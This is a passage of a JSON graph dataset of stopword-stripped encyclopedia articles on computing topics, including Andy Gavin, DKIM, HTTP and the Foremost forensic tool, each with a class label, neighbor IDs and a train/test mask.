    "text": "Andy_Gavin:andy gavin andrew scott andy gavin born june 11 1970 american video game programmer designer entrepreneur novelist video game industry known co-founding video game company naughty dog childhood friend jason rubin 1986 games crash bandicoot jak daxter released critical acclaim sophistication naughty dog technology often credited gavin background lisp mit artificial intelligence laboratory gavin earned bachelor science degree neurobiological science haverford college gavin studied ph.d. massachusetts institute technology carried research jet propulsion laboratory mars rover vision project advisor rod brooks still student gavin learned computer programming language lisp influences m.i.t work lead develop number custom programming languages improved quality graphics controls sounds artificial intelligence naughty dog video games gavin rubin sold first video game math jam 1985 1989 sold keef thief electronic arts early '90s fighting game way warrior led multi-title deal universal interactive studios auspices universal deal produced multi-million selling crash bandicoot series 1994 1999 later segued critically acclaimed jak daxter series games end 2000 rubin gavin sold naughty dog sony computer entertainment america scea created 14 naughty dog games including math jam 1985 ski crazed 1986 dream zone 1987 keef thief 1989 rings power 1991 way warrior 1994 crash bandicoot 1996 1997 1998 crash team racing 1999 2001 jak ii 2003 jak 3 2004 2005 together games sold 35 million units generated 1 billion revenue naughty dog gavin developed two lisp dialects use game development gool game object oriented lisp successor goal game oriented assembly lisp represented departure mainstream terms language choice featured innovations design shortly leaving naughty dog 2004 gavin co-founded new internet startup called flektor former business partner jason rubin former hbo executive jason r. kay may 2007 company sold fox interactive media division news corp. fox described company next-generation web site provides users suite web-based tools transform photos videos dynamic slideshows postcards live interactive presentations video mash-ups october 2007 flektor partnered sister company myspace mtv provide instant audience feedback via polls interactive myspace mtv presidential dialogues series then-presidential candidate senator barack obama gavin left fox interactive media 2008 2009 announced return video game business naughty dog co-founder jason rubin formed new social game startup called monkey gods working new version snood along casual word game called monkwerks recent years gavin turned novel writing first novel dark historical fantasy darkening dream published december 2011 second novel untimed involves time travel released december 19 2012",
    "neighbors": [
      11488,
      4516,
      6502,
      8937,
      10316
    ],
    "mask": "None"
  },
  {
    "node_id": 4787,
    "label": 4,
    "text": "David_Wang_(hacker):david wang hacker david wang jail break developer mobile phone hacker apple phone hacking competition hacked iphone use android apps platform",
    "neighbors": [
      9732,
      4957
    ],
    "mask": "Test"
  },
  {
    "node_id": 4788,
    "label": 3,
    "text": "Schools_Interoperability_Framework:schools interoperability framework schools interoperability framework systems interoperability framework uk sif data-sharing open specification academic institutions kindergarten workforce specification used primarily united states canada uk australia new zealand however increasingly implemented india elsewhere specification comprises two parts xml specification modeling educational data specific educational locale north america australia uk service-oriented architecture soa based direct brokered restful-models sharing data institutions international shared locales sif product industry initiative enables diverse applications interact share data sif estimated used 48 us states 6 countries supporting five million students specification started maintained specification body schools interoperability framework association renamed access learning community a4l 2015 traditionally standalone applications used public school districts limitation data isolation difficult access share data often results redundant data entry data integrity problems inefficient incomplete reporting cases student information appear multiple places may identical example decision makers may working incomplete inaccurate information many district site technology coordinators also experience increase technical support problems maintaining numerous proprietary systems sif created solve issues schools interoperability framework sif began initiative chiefly championed initially microsoft create blueprint educational software interoperability data access designed initiative drawing upon strengths leading vendors k-12 market enable schools professionals build manage upgrade systems endorsed close 20 leading k-12 vendors student information library transportation food service applications first pilot sites began summer 1999 first sif-based products began show 2000 beginning clear approach would become national standard united states sif edi vying position 2000 sif began taking lead 2002 2000 national school boards association held panel discussion annual meeting topic sif 2007 united kingdom becta championed adoption sif national standard schools data interchange 2008 announced uk standard become known systems interoperability framework reflects intention uk develop sif used organizations beyond schools sif specification supported a4l community a4l members collaborate variety technical solutions standards include limited schools interoperability framework members include districts states vendors non-profits various government agencies sif pains challenges come soa specification data model building specifications via consensus everyone always happy sometimes end product n't perfect also given moving parts modeling entire k12 enterprise specification many points possible failure particular sif record-level automated system moving standardized data one source another heterogeneous environment out-of-the-box interoperability ease use implementation part 12-18 month focus 2007 2009 sif 2.x relied using broker called zone integration server zis manage communication applications sif 3.x sif 2.8+ allows brokered direct communication applications rather application vendor try set separate connection every application sif defined set rules definitions share data within sif zone — environment logical grouping applications software application agents communicate central communication point zones managed enterprise data broker sometimes called zone integration server zis single zis manage multiple zones however current infrastructure specification supports restful connections directly applications and/or utilizing brokered environment data travels applications series standardized messages queries events written xml json sent using internet protocols sif specification defines events choreography allows data move back forth applications direct sif allow one application communicate directly another via simple rest calls put post get delete resources ideal simple environments two maybe three players complex choreographies necessary easier implement brokered environment two- three-node situations sif agents pieces software exist either internal application installed next sif agents function extensions application serve intermediary software application sif zone brokered environments broker keeps track agents registered environment zones manages transactions agents enabling provide data respond requests broker controls access routing security within system standardization behavior agents broker means sif add standard functionality zone simply adding sif-enabled applications time vertical interoperability situation sif agents different levels organization communicate using sif zone vertical interoperability involves data collection multiple agents upward publishing information multiple agents downward example state-level data warehouse may listen changes district-level data warehouses update database accordingly state entity may wish publish teacher certification data districts three pieces sif specification deal directly vertical interoperability student locator object vertical reporting object data warehouse object good example would century consultants sis agent working pearson slf agent sending student data state agency getting student testing identifiers return sif designed rest soap namespaces web service standards mature today result robust soa vetted current soap specifications use soap ws standards 2.0 sif web services specification began process joining two worlds 3.0 infrastructure specification completes transformation soa specification using modern tools 2.0 web services specification allows generalized xml messaging structures typically found enterprise messaging systems use concept enterprise service bus web service standards also designed support secure public interfaces xml appliances make setup configuration easier sif 2.0 web services specification allows use web services communicate zone 3.0 infrastructure allows data payload moved across designed around restful design patterns allows brokered direct exchanges restful manner utilizing either xml json payloads starting sif 3.0 sif specification relies entirely-unless impossible practical- common education data standards ceds controlled vocabulary element definition allows transport ceds wire compatible ceds-compliant data sets similar standard liss supports vendor integration 'within school site overcomes limitations school elected use zone integration server requirement sif 3.x implementations liss lightweight interoperability standard schools connects primarily smaller 'local modules timetabling roll call reporting others main admin system given school site liss works either across web via local network simpler format sifa also working closely postsecondary electronic standards council pesc scorm standards organizations august 2013 sif association announced release sif implementation specification 3.0 sif implementation specification north america 3.0 made globally utilized reference infrastructure north america data model focusing supporting common education data standards ceds initiative new 3.0 infrastructure allows transport various data models including global sif communities well data numerous “ alphabet soup ” data initiatives populating education landscape essence – education utilize “ one wire one plug ” – never-ending proprietary api ’ “ one ” connections specification fully supports restful web services soap-based protocols australian 3.4 data model specification came fall 2016 well 3.1.2 release global sif infrastructure version 2.8 specification last 2.x version sif sif implementations united states abroad 2.x deployments a4l community released new version sif specification called unity use best objects 3.x specification foundation 2.8 specification able run either 3.x infrastructure 2.x infrastructure boon thousands districts many states using sif 2 infrastructure allows clean migration path utilizing modern restful architectures desired sif 3.2 release includes sif xpress roster sif xpress student record exchange sre result work done various members association vendors agencies regional centers easily adopted easier implement sub-set specification handles roster basic uses cases access learning community recently started taking strong leadership education privacy space globally association created supports organization called student data privacy consortium sdpc working closely national australian privacy efforts",
    "neighbors": [
      545,
      10020,
      4107,
      10486,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 4789,
    "label": 4,
    "text": "Foremost_(software):foremost software foremost forensic data recovery program linux used recover files using headers footers data structures process known file carving although written law enforcement use freely available used general data recovery tool foremost created march 2001 duplicate functionality dos program carvthis use linux platform foremost originally written special agents kris kendall jesse kornblum u.s. air force office special investigations 2005 program modified nick mikus research associate naval postgraduate school center information systems security studies research part master thesis modifications included improvements foremost accuracy extraction rates foremost designed ignore type underlying filesystem directly read copy portions drive computer memory takes portions one segment time using process known file carving searches memory file header type matches ones found foremost configuration file match found writes header data following file stopping either footer found file size limit reached foremost used command-line interface graphical user interface option available able recover specific filetypes including jpg gif png bmp avi exe mpg wav riff wmv mov pdf ole doc zip rar htm cpp configuration file usually found /usr/local/etc/foremost.conf used define additional file types foremost used recover data image files directly hard drives use ext3 ntfs fat filesystems foremost also used via computer recover data iphones",
    "neighbors": [
      9732,
      2437,
      2193,
      5010,
      4500,
      8469,
      2199,
      3099,
      7968,
      6177,
      5284,
      11182,
      7983,
      10290,
      823,
      8635,
      2494,
      830,
      7369,
      6475,
      10189,
      4049,
      4834,
      5475,
      7525,
      9319,
      7160,
      11642,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 4790,
    "label": 2,
    "text": "DNALinux:dnalinux dnalinux linux distribution bioinformatics software included live cd based slax includes programs like blast emboss dnalinux made genes digitales quilmes national university argentina",
    "neighbors": [
      4611,
      3079,
      3089,
      4113,
      8209,
      8727,
      543,
      11297,
      7204,
      9253,
      11305,
      56,
      3129,
      4153,
      59,
      8248,
      9276,
      4673,
      3654,
      5190,
      3147,
      2125,
      1107,
      1110,
      89,
      5721,
      4192,
      3685,
      10860,
      5742,
      2671,
      11388,
      1150,
      2692,
      8837,
      9353,
      9873,
      11410,
      8857,
      10394,
      6301,
      10397,
      5279,
      673,
      3745,
      1700,
      7332,
      7845,
      10920,
      9899,
      3245,
      7854,
      2738,
      4279,
      10425,
      2239,
      9407,
      2763,
      8907,
      3791,
      6352,
      7385,
      11481,
      4841,
      6890,
      7913,
      6380,
      7920,
      6898,
      5363,
      9461,
      1782,
      6393,
      5369,
      8957,
      4355,
      7435,
      2321,
      5397,
      6934,
      4887,
      8992,
      10530,
      6436,
      2853,
      3369,
      823,
      3387,
      7483,
      3903,
      11587,
      2375,
      5959,
      9048,
      8033,
      2914,
      5990,
      9064,
      7020,
      7534,
      11121,
      9074,
      11648,
      390,
      1416,
      905,
      10127,
      912,
      11669,
      10646,
      926,
      9119,
      10149,
      6055,
      7082,
      1455,
      948,
      439,
      10694,
      4039,
      975,
      9689,
      2010,
      9693,
      485,
      495,
      8177,
      8180,
      5110,
      11263
    ],
    "mask": "None"
  },
  {
    "node_id": 4791,
    "label": 9,
    "text": "Proof_assistant:proof assistant computer science mathematical logic proof assistant interactive theorem prover software tool assist development formal proofs human-machine collaboration involves sort interactive proof editor interface human guide search proofs details stored steps provided computer theorem prover museum initiative conserve sources theorem prover systems future analysis since important cultural/scientific artefacts sources many systems mentioned popular front-end proof assistants emacs-based proof general developed university edinburgh coq includes coqide based ocaml/gtk isabelle includes isabelle/jedit based jedit isabelle/scala infrastructure document-oriented proof processing",
    "neighbors": [
      4612,
      3209,
      2062,
      7185,
      11026,
      11028,
      8088,
      11034,
      5663,
      5920,
      3876,
      5796,
      4268,
      6188,
      2618,
      4670,
      8511,
      5064,
      11083,
      5715,
      3926,
      5079,
      9816,
      4955,
      8924,
      10460,
      4446,
      6239,
      4455,
      883,
      5365,
      3705,
      1019
    ],
    "mask": "None"
  },
  {
    "node_id": 4792,
    "label": 9,
    "text": "Simulation_software:simulation software simulation software based process modeling real phenomenon set mathematical formulas essentially program allows user observe operation simulation without actually performing operation simulation software used widely design equipment final product close design specs possible without expensive process modification simulation software real-time response often used gaming also important industrial applications penalty improper operation costly airplane pilots nuclear power plant operators chemical plant operators amock actual control panel connected real-time simulation physical response giving valuable training experience without fear disastrous outcome advanced computer programs simulate power system behavior weather conditions electronic circuits chemical reactions mechatronics heat pumps feedback control systems atomic reactions even complex biological processes theory phenomena reduced mathematical data equations simulated computer simulation difficult natural phenomena subject almost infinite number influences one tricks developing useful simulations determine important factors affect goals simulation addition imitating processes see behave different conditions simulations also used test new theories creating theory causal relationships theorist codify relationships form computer program program behaves way real process good chance proposed relationships correct general simulation packages fall two categories discrete event continuous simulation discrete event simulations used model statistical events customers arriving queues bank properly correlating arrival probabilities observed behavior model determine optimal queue count keep queue wait times specified level continuous simulators used model wide variety physical phenomena like ballistic trajectories human respiration electric motor response radio frequency data communication steam turbine power generation etc simulations used initial system design optimize component selection controller gains well model based design systems generate embedded control code real-time operation continuous simulation used operator training off-line controller tuning four main renowned simulation approaches event-scheduling method activity scanning process- interaction three-phase approach comparison following noted event-scheduling method simpler two phases cs bs allow program run faster since scanning condition nal events advantages also tells us something disadvantages method since two phase events mixed bs cs method parsimony means hard enhance pidd,1998 activity scanning approach also simpler three-phase method since calendar support parsimonious modeling however approach much slower three-phase since treats activities treated conditional hand executive two phases usually approach confused three-phase method pidd 1998 process- interaction “ share two common advantages first avoid programs slow run second avoid need think possible logical consequences event ” pidd 1998 yet pidd 1998 claims approach suffers deadlock problem approach attractive novice modelers although schriber et al 2003 says “ process interaction understood elite group individuals beyond reach ordinary programmers ” fact schriber et al 2003 .adds “ .multi- threaded applications talked computer science classes rarely used broader community ” indicates implementation process-interaction difficult implement obvious contradiction previous quote due mix process interaction approach transaction-flow approach see complete idea origins transaction-flow best stated schriber et al 2003 primordial soup gordon simulator arose gordon ’ transaction flow world-view cleverly disguised form process interaction put process interaction approach within grasp ordinary users gordon one great packaging jobs time devised set building blocks could put together build flowchart graphically depicted operation system modeling paradigm flow elements system readily visible focus whole approach three-phase approach allows “ simulate parallelism whilst avoiding deadlock ” pidd cassel 1998 yet three-phase scan schedule bound activities scans conditional activities slow yet many forgo time spent return solving deadlock problem fact three-phase used distributed systems whether talking operating systems databases etc different names among three-phase commit see tanenbaum steen 2002 electronics simulation software utilizes mathematical models replicate behaviour actual electronic device circuit essentially computer program converts computer fully functioning electronics laboratory electronics simulators integrate schematic editor spice simulator onscreen waveforms make “ what-if ” scenarios easy instant simulating circuit ’ behaviour actually building greatly improves efficiency provides insights behavior stability electronics circuit designs simulators use spice engine simulates analog digital mixed circuits exceptional power accuracy also typically contain extensive model device libraries simulators typically printed circuit board pcb export capabilities essential design testing circuits primary application electronic circuit simulation strictly analog electronics circuit simulators include analog event-driven digital simulation capabilities known mixed-mode simulators means simulation may contain components analog event driven digital sampled-data combination entire mixed signal analysis driven one integrated schematic digital models mixed-mode simulators provide accurate specification propagation time rise/fall time delays event driven algorithm provided mixed-mode simulators general purpose supports non-digital types data example elements use real integer values simulate dsp functions sampled data filters event driven algorithm faster standard spice matrix solution simulation time greatly reduced circuits use event driven models place analog models mixed-mode simulation handled three levels primitive digital elements use timing models built-in 12 16 state digital logic simulator b subcircuit models use actual transistor topology integrated circuit finally c in-line boolean logic expressions exact representations used mainly analysis transmission line signal integrity problems close inspection ic ’ i/o characteristics needed boolean logic expressions delay-less functions used provide efficient logic signal processing analog environment two modeling techniques use spice solve problem third method digital primitives use mixed mode capability methods merits target applications fact many simulations particularly use a/d technology call combination three approaches one approach alone sufficient order properly understand operation programmable logic controller plc necessary spend considerable time programming testing debugging plc programs plc systems inherently expensive down-time often costly addition plc programmed incorrectly result lost productivity dangerous conditions plc simulation software valuable tool understanding learning plcs keep knowledge refreshed date plc simulation provides users ability write edit debug programs written using tag-based format many popular plcs use tags powerful method programming plcs also complex plc simulation integrates tag-based ladder logic programs 3d interactive animations enhance user ’ learning experience interactive animations include traffic lights batch processing bottling lines using plc simulation plc programmers freedom try what-if scenarios changing ladder logic instructions programs re-running simulation see changes affect plc operation performance type testing often feasible using hardwired operating plcs control processes often worth hundreds thousands – millions dollars sheet metal forming simulation software utilizes mathematical models replicate behavior actual metal sheet manufacturing process essentially computer program converts computer fully functioning metal manufacturing prediction unit sheet metal forming simulation prevents metal factories defects production lines reduces testing expensive mistakes improving efficiency metal forming process metal casting simulation currently performed finite element method simulation software designed defect-prediction tool foundry engineer order correct and/or improve his/her casting process even prototype trials produced idea use information analyze predict results simple effective manner simulate different processes software would normally following specifications interaction different network entities defined various communication protocols network simulation software simulates behavior networks protocol level network protocol simulation software used develop test scenarios understand network behavior certain protocol messages compliance new protocol stack implementation protocol stack testing simulators based telecommunications protocol architecture specifications developed international standards body itu-t ieee output protocol simulation software detailed packet traces events logs etc understanding computers made many components component many different attributes different manufacturer accordingly computer performance evaluation another application simulation would paramount significance particularly since experimenting possible scenarios nearly impossible commercial simulation packages caught fact two packages offered application namely anylogic 5.0 visual simulation environment",
    "neighbors": [
      8162,
      10085,
      2410,
      7819,
      749,
      5881,
      8278,
      1721
    ],
    "mask": "Test"
  },
  {
    "node_id": 4793,
    "label": 4,
    "text": "DomainKeys_Identified_Mail:domainkeys identified mail domainkeys identified mail dkim email authentication method designed detect forged sender addresses emails email spoofing technique often used phishing email spam dkim allows receiver check email claimed come specific domain indeed authorized owner domain achieves affixing digital signature linked domain name outgoing email message recipient system verify looking sender public key published dns valid signature also guarantees parts email possibly including attachments modified since signature affixed usually dkim signatures visible end-users affixed verified infrastructure rather message authors recipients dkim internet standard defined rfc 6376 dated september 2011 updates rfc 8301 rfc 8463 need email validated identification arises forged addresses content otherwise easily created widely used spam phishing email-based fraud example fraudster may send message claiming sender example.com goal convincing recipient accept read email difficult recipients establish whether trust message system administrators also deal complaints malicious email appears originated systems dkim provides ability sign message allows signer author organization communicate emails considers legitimate directly prevent disclose abusive behavior dkim also provides process verifying signed message verifying modules typically act behalf receiver organization possibly hop independent simple mail transfer protocol smtp routing aspects operates rfc 5322 message—the transported mail header body—not smtp envelope defined rfc 5321 hence dkim signatures survives basic relaying across multiple mtas signing organization direct handler message author submission site intermediary along transit path indirect handler independent service providing assistance direct handler signing modules insert one codice_1 header fields possibly behalf author organization originating service provider specification allows signers choose header fields sign codice_2 field must always signed resulting header field consists list codice_3 parts example tags used relevant ones b actual digital signature contents headers body mail message bh body hash signing domain selector header body contribute signature first message body hashed always beginning possibly truncated given length may zero second selected header fields hashed order given h. repeated field names matched bottom header upward order codice_4 fields inserted header non-existing field matches empty string adding field name break signature codice_1 field signature created bh equal computed body hash b equal empty string implicitly added second hash albeit name must appear h — refers another preexisting signature hashes text canonicalized according relevant c algorithms result encryption signer private key encoding using base64 b. algorithms fields body length meant chosen assure unambiguous message identification still allowing signatures survive unavoidable changes going occur transit data integrity implied receiving smtp server wanting verify uses domain name selector perform dns lookup example given example signature tag gives author domain verified example.net tag selector brisbane string _domainkey fixed part specification gives txt resource record looked codice_6 data returned query record also list tag-value pairs includes domain public key along key usage tokens flags example receiver use public key value p tag validate signature hash value header field check hash value mail message headers body received two values match cryptographically proves mail signed indicated domain tampered transit signature verification failure force rejection message instead precise reasons authenticity message could proven made available downstream upstream processes methods may include sending back fbl message adding authentication-results header field message described rfc 7001 although domainkeys covered yahoo licensed patent claims dual license scheme domainkeys patent license agreement v1.2 gnu general public license v2.0 version essence dkim spf provide different measures email authenticity dmarc provides ability organisation publish policy specify mechanism dkim spf employed sending email domain check field presented end users receiver deal failures reporting mechanism actions performed policies primary advantage system e-mail recipients allowing signing domain reliably identify stream legitimate email thereby allowing domain-based blacklists whitelists effective also likely make certain kinds phishing attacks easier detect incentives mail senders sign outgoing e-mail dkim method labeling message filter identify spam however widespread use dkim prevent spammers forging source address messages technique commonly employ today spammers forced show correct source domain filtering techniques work effectively particular source domain feed reputation system better identify spam conversely dkim make easier identify mail known spam need filtered receiving system whitelist known good sending domains either locally maintained third party certifiers skip filtering signed mail domains perhaps filter remaining mail aggressively dkim useful anti-phishing technology mailers heavily phished domains sign mail show genuine recipients take absence valid signature mail domains indication mail probably forged best way determine set domains merit degree scrutiny remains open question dkim used optional feature called adsp lets authors sign mail self-identify demoted historic status november 2013 instead dmarc used purpose allows domains self-publish techniques including spf dkim employ makes easier receiver make informed decision whether certain mail spam example using dmarc ebay paypal publish policies mail authenticated requesting receiving system gmail reject implemented using dns records added rfc 5322 header field dkim compatible existing e-mail infrastructure particular transparent existing e-mail systems lack dkim support design approach also compatible related services s/mime openpgp content-protection standards dkim compatible dnssec standard spf dkim requires cryptographic checksums generated message sent mail server results computational overhead otherwise required e-mail delivery additional computational overhead hallmark digital postmarks making sending bulk spam computationally expensive facet dkim may look similar hashcash except receiver side verification negligible amount work typical hashcash algorithm would require far work dkim non-repudiation feature prevents senders spammers credibly denying sent email proven useful news media sources wikileaks able leverage dkim body signatures prove leaked emails genuine tampered definitively repudiating claims hillary clinton 2016 us presidential election running mate tim kaine dnc chair donna brazile rfc identifies number potential attack vectors dkim signatures encompass message envelope holds return-path message recipients since dkim attempt protect mis-addressing affect utility number concerns raised refuted 2013 time standardization concern cryptographic solution would message replay abuse bypasses techniques currently limit level abuse larger domains replay inferred using per-message public keys tracking dns queries keys filtering high number queries due e-mail sent large mailing lists malicious queries bad actors comparison different methods also addressing problem see e-mail authentication mentioned authentication abuse prevention evil email user reputable domain compose bad message dkim-signed sent domain mailbox retrieve file obtain signed copy message use l tag signatures makes doctoring messages even easier signed copy forwarded million recipients example botnet without control email provider signed message block offending user stop diffusion already-signed messages validity signatures messages limited always including expiration time tag signatures revoking public key periodically upon notification incident effectiveness scenario hardly limited filtering outgoing mail implies ability detect message might potentially useful spammers dkim currently features two canonicalization algorithms simple relaxed neither mime-aware mail servers legitimately convert different character set often document x-mime-autoconverted header fields addition servers certain circumstances rewrite mime structure thereby altering preamble epilogue entity boundaries breaks dkim signatures plain text messages written us-ascii provided mime header fields signed enjoy robustness end-to-end integrity requires opendkim project organized data collection involving 21 mail servers millions messages 92.3 observed signatures successfully verified success rate drops slightly 90.5 mailing list traffic considered problems might exacerbated filtering relaying software makes changes message without specific precaution implemented sender footer addition operated mailing lists many central antivirus solutions break dkim signature possible mitigation sign designated number bytes message body indicated l tag dkim-signature header anything added beyond specified length message body taken account calculating dkim signature wo n't work mime messages another workaround whitelist known forwarders e.g. spf yet another workaround proposed forwarders verify signature modify email re-sign message sender header however solution risk forwarded third party signed messages received smtp receivers supporting rfc 5617 adsp protocol thus practice receiving server still whitelist known message streams october 2012 wired reported mathematician zach harris detected demonstrated email source spoofing vulnerability short dkim keys codice_7 corporate domain well several high-profile domains stated authentication 384-bit keys factored little 24 hours laptop 512-bit keys 72 hours cloud computing resources harris found many organizations sign email short keys factored notified organizations vulnerability states 768-bit keys could factored access large amounts computing power suggests dkim signing use key lengths greater 1,024 wired stated harris reported google confirmed began using new longer keys soon disclosure according rfc 6376 receiving party must able validate signatures keys ranging 512 bits 2048 bits thus usage keys shorter 512 bits might incompatible shall avoided rfc 6376 also states signers must use keys least 1024 bits long-lived keys though long-livingness specified dkim resulted 2004 merging two similar efforts enhanced domainkeys yahoo identified internet mail cisco merged specification basis series ietf standards-track specifications support documents eventually resulted std 76 currently rfc 6376 identified internet mail proposed cisco signature-based mail authentication standard domainkeys designed yahoo verify dns domain e-mail sender message integrity aspects domainkeys along parts identified internet mail combined create domainkeys identified mail dkim trendsetting providers implementing dkim include yahoo gmail aol fastmail mail organizations carry dkim signature discussions dkim signatures passing indirect mail flows formally dmarc working group took place right first adoptions new protocol wreaked havoc regular mailing list use however none proposed dkim changes passed instead mailing list software changed 2017 another working group launched dkim crypto update dcrup specific restriction review signing techniques rfc 8301 issued january 2018 bans sha-1 updates key sizes 512-2048 1024-4096 rfc 8463 issued september 2018 adds elliptic curve algorithm existing rsa added key type codice_8 adequately strong featuring short public keys easily publishable dns original domainkeys designed mark delany yahoo enhanced comments many others since 2004 specified historic rfc 4870 superseded standards track rfc 4871 domainkeys identified mail dkim signatures published may 2007 number clarifications conceptualizations collected thereafter specified rfc 5672 august 2009 form corrections existing specification september 2011 rfc 6376 merged updated latter two documents preserving substance dkim protocol public key compatibility earlier domainkeys also possible dkim initially produced informal industry consortium submitted enhancement standardization ietf dkim working group chaired barry leiba stephen farrell eric allman sendmail jon callas pgp corporation mark delany miles libbey yahoo jim fenton michael thomas cisco systems attributed primary authors source code development one common library led opendkim project following recent protocol additions licensing new bsd license",
    "neighbors": [
      5249,
      10242,
      517,
      5254,
      3847,
      649,
      8202,
      8332,
      9868,
      1297,
      3218,
      4883,
      8337,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      8735,
      10271,
      7075,
      9380,
      2085,
      2213,
      3751,
      3752,
      9381,
      10924,
      5421,
      4272,
      562,
      2354,
      2996,
      3508,
      182,
      6834,
      9909,
      10167,
      10171,
      3133,
      3006,
      4797,
      5181,
      5437,
      8130,
      7364,
      4294,
      2887,
      3145,
      8265,
      2509,
      4687,
      5843,
      2904,
      472,
      5082,
      5469,
      5470,
      5471,
      5472,
      8674,
      1125,
      10341,
      488,
      4969,
      9320,
      10344,
      11112,
      367,
      8432,
      8694,
      1658,
      6651
    ],
    "mask": "Validation"
  },
  {
    "node_id": 4794,
    "label": 1,
    "text": "Asia-Pacific_Trade_Agreements_Database:asia-pacific trade agreements database asia-pacific trade investment agreements database aptiad resource researchers policymakers area international trade investment online database allows searches two ways one relates agreements users search agreements members key terms types scopes agreements status another possibility search publications relevant regional integration trade agreements easier use database users download glossary related terms website trade agreements database component aptiad designed give researchers policymakers overview easy access regional bilateral trade agreements entered negotiation countries asia pacific region june 2008 136 agreements including agreements notified wto official information readily available also agreements negotiation least first formal negotiation round interactive trade indicators component aptiad designed help policymakers calculate commonly used indicators related trade performance national economies and/or trade agreements interactive trade indicator database enables select indicators e.g export/import value export/import growth export/import share trade share trade intensity country region product year export flows downloaded un comtrade using world integrated trade solution wits last 10 years present 1998-2007 selected developed developing countries asia-pacific region asia-pacific trade agreements database aptiad product trade investment division united nations economic social commission asia pacific",
    "neighbors": [],
    "mask": "Train"
  },
  {
    "node_id": 4795,
    "label": 8,
    "text": "Parlay_X:parlay x parlay x set standard web service apis telephone network fixed mobile defunct replaced oneapi current valid standard gsm association telecom third party api enables software developers use capabilities underlying network apis deliberately high level abstractions designed simple use application developer example invoke single web service request get location mobile device initiate telephone call parlay x web services defined jointly etsi parlay group third generation partnership project 3gpp oma done maintenance specifications 3gpp release 8 apis defined using web service technology interfaces defined using wsdl 1.1 conform web services interoperability ws-i basic profile apis published set specifications general parlay x provides abstraction functionality exposed complex functionally richer parlay apis etsi provide set informative normative parlay x parlay mapping documents parlay x services rolled number telecom operators including bt korea telecom t-com mobilekom sprint",
    "neighbors": [
      10020,
      8981,
      8070
    ],
    "mask": "Test"
  },
  {
    "node_id": 4796,
    "label": 3,
    "text": "NMS-8250:nms-8250 philips nms-8250 nms short new media systems professional msx 2 home computer high end market two built floppy disk drives pizza box configuration machine fact manufactured sanyo basically mpc-25fs different color featured professional video output possibilities scart better picture quality detachable keyboard",
    "neighbors": [
      5128,
      780,
      9006,
      2383,
      1776
    ],
    "mask": "Test"
  },
  {
    "node_id": 4797,
    "label": 5,
    "text": "Hypertext_Transfer_Protocol:hypertext transfer protocol hypertext transfer protocol http application protocol distributed collaborative hypermedia information systems http foundation data communication world wide web hypertext documents include hyperlinks resources user easily access example mouse click tapping screen web browser development http initiated tim berners-lee cern 1989 development early http requests comments rfcs coordinated effort internet engineering task force ietf world wide web consortium w3c work later moving ietf http/1.1 first documented 1997 specification obsoleted 1999 likewise replaced family rfcs 2014 http/2 efficient expression http semantics wire published 2015 supported major web servers browsers transport layer security tls using application-layer protocol negotiation alpn extension tls 1.2 newer required.. http/3 proposed successor http/2 using udp instead tcp underlying transport protocol like http/2 obsolete previous major versions protocol http functions request–response protocol client–server computing model web browser example may client application running computer hosting website may server client submits http request message server server provides resources html files content performs functions behalf client returns response message client response contains completion status information request may also contain requested content message body web browser example user agent ua types user agent include indexing software used search providers web crawlers voice browsers mobile apps software accesses consumes displays web content http designed permit intermediate network elements improve enable communications clients servers high-traffic websites often benefit web cache servers deliver content behalf upstream servers improve response time web browsers cache previously accessed web resources reuse possible reduce network traffic http proxy servers private network boundaries facilitate communication clients without globally routable address relaying messages external servers http application layer protocol designed within framework internet protocol suite definition presumes underlying reliable transport layer protocol transmission control protocol tcp commonly used however http adapted use unreliable protocols user datagram protocol udp example httpu simple service discovery protocol ssdp http resources identified located network uniform resource locators urls using uniform resource identifiers uri schemes http https example including optional components codice_1 uris encoded hyperlinks html documents form interlinked hypertext documents http/1.1 revision original http http/1.0 http/1.0 separate connection server made every resource request http/1.1 reuse connection multiple times download images scripts stylesheets etc page delivered http/1.1 communications therefore experience less latency establishment tcp connections presents considerable overhead term hypertext coined ted nelson 1965 xanadu project turn inspired vannevar bush 1930s vision microfilm-based information retrieval management memex system described 1945 essay may think tim berners-lee team cern credited inventing original http along html associated technology web server text-based web browser berners-lee first proposed worldwideweb project 1989—now known world wide web first version protocol one method namely get would request page server response server always html page first documented version http http v0.9 1991 dave raggett led http working group http wg 1995 wanted expand protocol extended operations extended negotiation richer meta-information tied security protocol became efficient adding additional methods header fields officially introduced recognized http v1.0 1996 http wg planned publish new standards december 1995 support pre-standard http/1.1 based developing called http-ng rapidly adopted major browser developers early 1996 march year pre-standard http/1.1 supported arena netscape 2.0 netscape navigator gold 2.01 mosaic 2.7 lynx 2.5 internet explorer 2.0 end-user adoption new browsers rapid march 1996 one web hosting company reported 40 browsers use internet http 1.1 compliant web hosting company reported june 1996 65 browsers accessing servers http/1.1 compliant http/1.1 standard defined officially released january 1997 improvements updates http/1.1 standard released june 1999 2007 http working group formed part revise clarify http/1.1 specification june 2014 wg released updated six-part specification obsoleting http/2 published may 2015 http session sequence network request-response transactions http client initiates request establishing transmission control protocol tcp connection particular port server typically port 80 occasionally port 8080 see list tcp udp port numbers http server listening port waits client request message upon receiving request server sends back status line http/1.1 200 ok message body message typically requested resource although error message information may also returned http/0.9 1.0 connection closed single request/response pair http/1.1 keep-alive-mechanism introduced connection could reused one request persistent connections reduce request latency perceptibly client need re-negotiate tcp 3-way-handshake connection first request sent another positive side effect general connection becomes faster time due tcp slow-start-mechanism version 1.1 protocol also made bandwidth optimization improvements http/1.0 example http/1.1 introduced chunked transfer encoding allow content persistent connections streamed rather buffered http pipelining reduces lag time allowing clients send multiple requests waiting response another addition protocol byte serving server transmits portion resource explicitly requested client http stateless protocol stateless protocol require http server retain information status user duration multiple requests however web applications implement states server side sessions using instance http cookies hidden variables within web forms http provides multiple authentication schemes basic access authentication digest access authentication operate via challenge-response mechanism whereby server identifies issues challenge serving requested content http provides general framework access control authentication via extensible set challenge-response authentication schemes used server challenge client request client provide authentication information http authentication specification also provides arbitrary implementation-specific construct dividing resources common given root uri realm value string present combined canonical root uri form protection space component challenge effect allows server define separate authentication scopes one root uri client sends requests server server sends responses request message consists following request line header fields must end cr lf carriage return character followed line feed character empty line must consist cr lf whitespace http/1.1 protocol header fields except host optional request line containing path name accepted servers maintain compatibility http clients http/1.0 specification http defines methods sometimes referred verbs nowhere specification mention verb options head verb indicate desired action performed identified resource resource represents whether pre-existing data data generated dynamically depends implementation server often resource corresponds file output executable residing server http/1.0 specification defined get 